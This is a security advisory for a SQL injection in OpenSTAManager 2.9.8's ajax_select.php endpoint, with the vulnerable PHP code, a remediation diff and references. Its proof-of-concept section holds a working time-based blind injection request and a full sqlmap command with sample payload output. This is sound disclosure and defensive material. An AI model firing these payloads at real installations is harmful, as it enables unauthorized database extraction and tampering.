📄 OpenSTAManager 2.9.8 SQL Injection

# CVE-2025-69214: OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | [CVE-2025-69214](https://nvd.nist.gov/vuln/detail/CVE-2025-69214) |
    | **Severity** | HIGH |
    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m) |
    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
    
    ## Affected Products
    
    - **devcode-it/openstamanager** (versions: <= 2.9.8)
    
    
    ## CWE Classification
    
    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    
    ## Details
    
    ## Summary
    A SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.
    
    ## Proof of Concept
    
    ### Vulnerable Code
    **File:** `modules/impianti/ajax/select.php:122-124`
    
    ```php
    case 'componenti':
        $impianti = $superselect['matricola'];
        if (!empty($impianti)) {
            $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
        }
    ```
    
    ### Data Flow
    1. **Source:** `$_GET['options']['matricola']` → `$superselect['matricola']`
    2. **Vulnerable:** User input concatenated directly into `IN()` clause without sanitization
    3. **Sink:** Query executed via AJAX framework
    
    ### Exploit
    
    **Manual PoC (Time-based Blind SQLi):**
    ```http
    GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
    Host: localhost:8081
    Cookie: PHPSESSID=<valid-session>
    ```
    <img width="1306" height="581" alt="image" src="https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011" />
    
    **SQLMap Exploitation:**
    ```bash
    sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
      --cookie="PHPSESSID=<session>" \
      --dbms=MySQL \
      --technique=T \
      --level=3 \
      --risk=3
    ```
    
    **SQLMap Output:**
    ```
    [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
    Parameter: #1* (URI)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
    back-end DBMS: MySQL >= 5.0.12
    ```
    <img width="1228" height="801" alt="image" src="https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b" />
    
    ## Impact
    - **Data Exfiltration:** Time-based blind SQL injection allows complete database extraction
    - **Authentication Bypass:** Access to sensitive component and equipment data
    - **Data Manipulation:** Potential unauthorized modification of records
    
    ## Remediation
    
    Cast values to integers before using in SQL:
    
    **Before:**
    ```php
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }
    ```
    
    **After:**
    ```php
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $ids = array_map('intval', explode(',', $impianti));
        $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
    }
    ```
    
    ## Credit
    Discovered by: Łukasz Rybak
    
    ## References
    
    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69214
    - https://github.com/advisories/GHSA-qjv8-63xq-gq8m
    
    
    ## Disclaimer
    
    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.